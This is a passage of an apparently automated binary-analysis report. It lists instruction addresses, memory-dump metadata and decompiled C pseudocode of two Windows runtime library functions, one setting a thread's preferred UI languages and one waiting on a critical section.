                                                      0x017d261e
                                                      0x00000000
                                                      0x017d2624
                                                      0x017d2627
                                                      0x017d2627
                                                      0x00000000
                                                      0x00000000
                                                      0x01815b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2894
                                                      0x017d289b
                                                      0x017d289d
                                                      0x017d28a1
                                                      0x01815b2b
                                                      0x01815b2e
                                                      0x01815b2e
                                                      0x017d28a7
                                                      0x017d28a9
                                                      0x01815b04
                                                      0x01815b09
                                                      0x01815b09
                                                      0x01815b09
                                                      0x00000000
                                                      0x00000000
                                                      0x01815b35
                                                      0x01815b3c
                                                      0x017d28fb
                                                      0x017d28fb
                                                      0x017d26cc
                                                      0x017d26cc
                                                      0x017d26d0
                                                      0x00000000
                                                      0x017d26d2
                                                      0x017d26d2
                                                      0x00000000
                                                      0x017d26d2
                                                      0x00000000
                                                      0x00000000
                                                      0x017d25fe
                                                      0x017d292d
                                                      0x017d292f
                                                      0x017d2930
                                                      0x017d2935
                                                      0x017d2937
                                                      0x017d2939
                                                      0x017d2939
                                                      0x017d293a
                                                      0x017d293a
                                                      0x017d293a
                                                      0x017d293d
                                                      0x017d293f
                                                      0x017d2941
                                                      0x017d2941
                                                      0x017d2942
                                                      0x017d2945
                                                      0x017d2945
                                                      0x017d2945
                                                      0x017d2946
                                                      0x017d294e
                                                      0x017d294f
                                                      0x017d295a
                                                      0x017d295d
                                                      0x017d2960
                                                      0x017d2960
                                                      0x017d2962
                                                      0x017d2963
                                                      0x017d2965
                                                      0x017d2965
                                                      0x017d2966
                                                      0x017d2969
                                                      0x017d296a
                                                      0x017d296a
                                                      0x017d296a
                                                      0x017d296e
                                                      0x017d296f
                                                      0x017d2971
                                                      0x017d2971
                                                      0x017d2972
                                                      0x017d2973
                                                      0x017d297b
                                                      0x017d2981
                                                      0x017d2982
                                                      0x017d2983
                                                      0x017d2984
                                                      0x017d2985
                                                      0x017d2986
                                                      0x017d2987
                                                      0x017d2988
                                                      0x017d2989
                                                      0x017d298a
                                                      0x017d298b
                                                      0x017d298c
                                                      0x017d298d
                                                      0x017d298e
                                                      0x017d298f
                                                      0x017d2990
                                                      0x017d2992
                                                      0x017d2997
                                                      0x017d29a3
                                                      0x017d29a6
                                                      0x017d29ab
                                                      0x017d29ad
                                                      0x017d29b0
                                                      0x017d29b2
                                                      0x01815c80
                                                      0x017d29b8
                                                      0x017d29b8
                                                      0x017d29bb
                                                      0x017d29c0
                                                      0x017d29c5
                                                      0x017d29c6
                                                      0x017d29c6
                                                      0x017d29c9
                                                      0x017d29cb
                                                      0x00000000
                                                      0x00000000
                                                      0x017d29cd
                                                      0x017d29d0
                                                      0x017d29d9
                                                      0x017d29db
                                                      0x017d29dd
                                                      0x017d2a7f
                                                      0x017d2a84
                                                      0x017d2a87
                                                      0x017d2a89
                                                      0x01815ca1
                                                      0x01815ca3
                                                      0x00000000
                                                      0x017d2a8f
                                                      0x017d2a8f
                                                      0x00000000
                                                      0x017d2a8f
                                                      0x00000000
                                                      0x017d29e3
                                                      0x017d29e3
                                                      0x017d29e3
                                                      0x00000000
                                                      0x017d29e3
                                                      0x017d29dd
                                                      0x00000000
                                                      0x017d29db
                                                      0x017d29e6
                                                      0x017d29e9
                                                      0x017d29eb
                                                      0x017d29ed
                                                      0x017d29f3
                                                      0x017d29f5
                                                      0x017d29f8
                                                      0x017d29fa
                                                      0x017d2a97
                                                      0x017d2a9a
                                                      0x017d2a9d
                                                      0x017d2add
                                                      0x00000000
                                                      0x017d2a9f
                                                      0x017d2aa2
                                                      0x017d2aa5
                                                      0x017d2aa8
                                                      0x017d2aab
                                                      0x01815cab
                                                      0x01815caf
                                                      0x01815cc5
                                                      0x01815cda
                                                      0x01815cdc
                                                      0x01815cdf
                                                      0x01815ce5
                                                      0x00000000
                                                      0x01815ceb
                                                      0x01815ced
                                                      0x01815cee
                                                      0x00000000
                                                      0x01815cee
                                                      0x01815cb1
                                                      0x01815cb4
                                                      0x01815cb9
                                                      0x01815cbb
                                                      0x00000000
                                                      0x01815cbd
                                                      0x01815cbd
                                                      0x00000000
                                                      0x01815cbd
                                                      0x01815cbb
                                                      0x017d2ab1
                                                      0x017d2ab1
                                                      0x017d2ac4
                                                      0x017d2ac6
                                                      0x017d2ac6
                                                      0x00000000
                                                      0x017d2ac6
                                                      0x017d2aab
                                                      0x00000000
                                                      0x017d2a00
                                                      0x017d2a09
                                                      0x017d2a0e
                                                      0x017d2a21
                                                      0x017d2a24
                                                      0x017d2a35
                                                      0x017d2a3a
                                                      0x017d2a3d
                                                      0x017d2a42
                                                      0x017d2a59
                                                      0x017d2a59
                                                      0x017d2a5c
                                                      0x017d2a5f
                                                      0x017d2a5f
                                                      0x017d29fa
                                                      0x017d29f3
                                                      0x017d2a64
                                                      0x017d2a64
                                                      0x017d2a6b
                                                      0x017d2a6b
                                                      0x017d2a6d
                                                      0x017d2a72
                                                      0x017d2a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                      • Instruction ID: 5a18848d7f91d089aee092e52c51c95eb478b9601902d3173c8e19f5b8f945c7
                                                      • Opcode Fuzzy Hash: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                      • Instruction Fuzzy Hash: 78C19E71E0021ADBDB25DFA9D880BAEFBB5FF49710F194029E901FB255D734A942CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017DFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E017DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E017BEEF0(0x1897b60);
					_t134 =  *0x1897b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1897b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1897b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E017B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01848938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E017AB150();
													}
													_t116 = E01846D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1898638; // 0x0
																	_t122 = L017B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L017DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E017DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E017DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E017DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E017DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E017DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1897b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1897b84 = _t75;
						_t73 = E017BEB70(_t134, 0x1897b60);
						if( *0x1897b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E017BFF60( *0x1897b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                      0x017dfab0
                                                      0x017dfab2
                                                      0x017dfab3
                                                      0x017dfab4
                                                      0x017dfabc
                                                      0x017dfac0
                                                      0x017dfb14
                                                      0x017dfb17
                                                      0x017dfac2
                                                      0x017dfac8
                                                      0x017dfacd
                                                      0x017dfad3
                                                      0x017dfad3
                                                      0x017dfadd
                                                      0x017dfb18
                                                      0x017dfb1b
                                                      0x017dfb1d
                                                      0x017dfb1e
                                                      0x017dfb1f
                                                      0x017dfb20
                                                      0x017dfb21
                                                      0x017dfb22
                                                      0x017dfb23
                                                      0x017dfb24
                                                      0x017dfb25
                                                      0x017dfb26
                                                      0x017dfb27
                                                      0x017dfb28
                                                      0x017dfb29
                                                      0x017dfb2a
                                                      0x017dfb2b
                                                      0x017dfb2c
                                                      0x017dfb2d
                                                      0x017dfb2e
                                                      0x017dfb2f
                                                      0x017dfb3a
                                                      0x017dfb3b
                                                      0x017dfb3e
                                                      0x017dfb41
                                                      0x017dfb44
                                                      0x017dfb47
                                                      0x017dfb4a
                                                      0x017dfb4d
                                                      0x017dfb53
                                                      0x0181bdcb
                                                      0x0181bdcb
                                                      0x017dfb59
                                                      0x017dfb5b
                                                      0x017dfb5b
                                                      0x017dfb5e
                                                      0x0181bdd5
                                                      0x0181bdd8
                                                      0x00000000
                                                      0x0181bdda
                                                      0x00000000
                                                      0x0181bdda
                                                      0x017dfb64
                                                      0x017dfb64
                                                      0x017dfb64
                                                      0x017dfb67
                                                      0x017dfb6e
                                                      0x017dfb70
                                                      0x017dfb72
                                                      0x00000000
                                                      0x017dfb78
                                                      0x017dfb7a
                                                      0x017dfb7a
                                                      0x017dfb7d
                                                      0x017dfb80
                                                      0x0181bddf
                                                      0x0181bde1
                                                      0x00000000
                                                      0x0181bde3
                                                      0x00000000
                                                      0x0181bde3
                                                      0x017dfb86
                                                      0x017dfb86
                                                      0x017dfb86
                                                      0x017dfb8b
                                                      0x017dfb90
                                                      0x017dfb92
                                                      0x017dfb94
                                                      0x017dfb9a
                                                      0x017dfb9b
                                                      0x017dfba1
                                                      0x0181bde8
                                                      0x0181bdeb
                                                      0x0181bded
                                                      0x0181beb5
                                                      0x0181beb5
                                                      0x0181bebb
                                                      0x0181bebd
                                                      0x0181bec3
                                                      0x0181bed2
                                                      0x0181bedd
                                                      0x0181bedd
                                                      0x0181beed
                                                      0x00000000
                                                      0x0181bdf3
                                                      0x0181bdfe
                                                      0x0181be06
                                                      0x0181be0b
                                                      0x0181be0d
                                                      0x0181be0f
                                                      0x0181be14
                                                      0x0181be19
                                                      0x0181be20
                                                      0x0181be25
                                                      0x0181be27
                                                      0x0181be35
                                                      0x0181be39
                                                      0x0181be46
                                                      0x0181be4f
                                                      0x0181be54
                                                      0x0181be56
                                                      0x0181bef8
                                                      0x0181bef8
                                                      0x00000000
                                                      0x0181be5c
                                                      0x0181be5c
                                                      0x0181be60
                                                      0x00000000
                                                      0x0181be66
                                                      0x0181be66
                                                      0x0181be7f
                                                      0x0181be84
                                                      0x0181be87
                                                      0x0181be89
                                                      0x0181be8b
                                                      0x0181be99
                                                      0x0181be9d
                                                      0x0181bea0
                                                      0x0181beac
                                                      0x0181beaf
                                                      0x0181beb1
                                                      0x0181beb3
                                                      0x0181beb3
                                                      0x00000000
                                                      0x0181bea2
                                                      0x0181bea2
                                                      0x00000000
                                                      0x0181bea2
                                                      0x0181be8d
                                                      0x0181be8d
                                                      0x0181be92
                                                      0x00000000
                                                      0x0181be92
                                                      0x0181be8b
                                                      0x0181be60
                                                      0x0181be3b
                                                      0x0181be3b
                                                      0x0181be3e
                                                      0x00000000
                                                      0x0181be40
                                                      0x0181be40
                                                      0x0181be44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0181be44
                                                      0x0181be3e
                                                      0x0181be29
                                                      0x0181be29
                                                      0x00000000
                                                      0x0181be29
                                                      0x0181be27
                                                      0x00000000
                                                      0x017dfba7
                                                      0x017dfba7
                                                      0x017dfbab
                                                      0x0181bf02
                                                      0x017dfbb1
                                                      0x017dfbb1
                                                      0x017dfbb8
                                                      0x017dfbbd
                                                      0x017dfbbd
                                                      0x017dfbbf
                                                      0x017dfbbf
                                                      0x017dfbc5
                                                      0x017dfbcb
                                                      0x017dfbf8
                                                      0x017dfbf8
                                                      0x017dfbfa
                                                      0x00000000
                                                      0x017dfc00
                                                      0x017dfc00
                                                      0x017dfc03
                                                      0x00000000
                                                      0x017dfc09
                                                      0x017dfc09
                                                      0x017dfc0f
                                                      0x017dfc15
                                                      0x017dfc23
                                                      0x017dfc23
                                                      0x017dfc25
                                                      0x017dfc27
                                                      0x017dfc75
                                                      0x017dfc7c
                                                      0x017dfc84
                                                      0x00000000
                                                      0x017dfc29
                                                      0x017dfc29
                                                      0x017dfc2d
                                                      0x017dfc30
                                                      0x0181bf0f
                                                      0x00000000
                                                      0x017dfc36
                                                      0x017dfc38
                                                      0x017dfc3b
                                                      0x017dfc41
                                                      0x0181bf17
                                                      0x0181bf19
                                                      0x0181bf48
                                                      0x0181bf4b
                                                      0x00000000
                                                      0x0181bf1b
                                                      0x0181bf22
                                                      0x0181bf24
                                                      0x0181bf26
                                                      0x00000000
                                                      0x0181bf2c
                                                      0x0181bf37
                                                      0x0181bf39
                                                      0x0181bf3b
                                                      0x00000000
                                                      0x0181bf41
                                                      0x0181bf41
                                                      0x0181bf41
                                                      0x0181bf41
                                                      0x0181bf45
                                                      0x00000000
                                                      0x0181bf45
                                                      0x0181bf3b
                                                      0x0181bf26
                                                      0x00000000
                                                      0x017dfc47
                                                      0x017dfc47
                                                      0x017dfc49
                                                      0x017dfcb2
                                                      0x017dfcb4
                                                      0x017dfcb6
                                                      0x017dfcdc
                                                      0x017dfcdc
                                                      0x00000000
                                                      0x017dfcb8
                                                      0x017dfcc3
                                                      0x017dfcc5
                                                      0x017dfcc7
                                                      0x00000000
                                                      0x017dfcc9
                                                      0x017dfcc9
                                                      0x017dfccd
                                                      0x00000000
                                                      0x017dfccd
                                                      0x017dfcc7
                                                      0x00000000
                                                      0x017dfc4b
                                                      0x017dfc4b
                                                      0x017dfc4e
                                                      0x017dfc4e
                                                      0x017dfc51
                                                      0x017dfc51
                                                      0x017dfc54
                                                      0x017dfc5a
                                                      0x017dfc5c
                                                      0x017dfc5f
                                                      0x017dfc61
                                                      0x017dfc63
                                                      0x017dfc65
                                                      0x017dfc67
                                                      0x017dfc6e
                                                      0x017dfc72
                                                      0x017dfc72
                                                      0x017dfc72
                                                      0x017dfc72
                                                      0x017dfc67
                                                      0x017dfc61
                                                      0x00000000
                                                      0x017dfc5a
                                                      0x017dfc49
                                                      0x017dfc41
                                                      0x017dfc30
                                                      0x017dfc27
                                                      0x017dfc03
                                                      0x017dfbcd
                                                      0x017dfbd3
                                                      0x017dfbd9
                                                      0x017dfbdc
                                                      0x017dfbde
                                                      0x017dfc99
                                                      0x017dfc9b
                                                      0x017dfc9d
                                                      0x017dfcd5
                                                      0x017dfcd5
                                                      0x017dfc89
                                                      0x017dfc89
                                                      0x00000000
                                                      0x017dfc9f
                                                      0x017dfc9f
                                                      0x017dfca3
                                                      0x00000000
                                                      0x017dfca3
                                                      0x00000000
                                                      0x017dfbe4
                                                      0x017dfbe4
                                                      0x017dfbe4
                                                      0x017dfbe4
                                                      0x017dfbe9
                                                      0x017dfbf2
                                                      0x00000000
                                                      0x017dfbf2
                                                      0x017dfbde
                                                      0x017dfbcb
                                                      0x017dfbab
                                                      0x017dfc8b
                                                      0x017dfc8b
                                                      0x017dfc8c
                                                      0x017dfb80
                                                      0x017dfb72
                                                      0x017dfb5e
                                                      0x017dfc8d
                                                      0x017dfc91
                                                      0x017dfadf
                                                      0x017dfadf
                                                      0x017dfae1
                                                      0x017dfae4
                                                      0x017dfae7
                                                      0x017dfaec
                                                      0x017dfaf8
                                                      0x017dfb00
                                                      0x017dfb07
                                                      0x017dfb0f
                                                      0x017dfb0f
                                                      0x017dfb07
                                                      0x00000000
                                                      0x017dfaf8
                                                      0x017dfadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0181BE0F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                      • Instruction ID: d6b72d5b5bc22bd21ad891813ce1a59008c6536f717f1bdc5eb2faad4b6508ec
                                                      • Opcode Fuzzy Hash: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                      • Instruction Fuzzy Hash: 22A10872B0060A8BEB25DF68C4547BAF7B5AF48710F04456EE94BDB685DB30DA42CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E017A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1895350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1897bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017E97C0();
				}
				if( *0x18979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E017D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E017C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0183FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E017DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L017FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1896901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1896901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E017C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E017C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01827016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0183FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1895350;
							if(_t109 != 0x1895350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0183FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01835720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                      0x017a2d8a
                                                      0x017a2d8a
                                                      0x017a2d92
                                                      0x017a2d96
                                                      0x017a2d9e
                                                      0x017a2da0
                                                      0x017a2da3
                                                      0x017a2da5
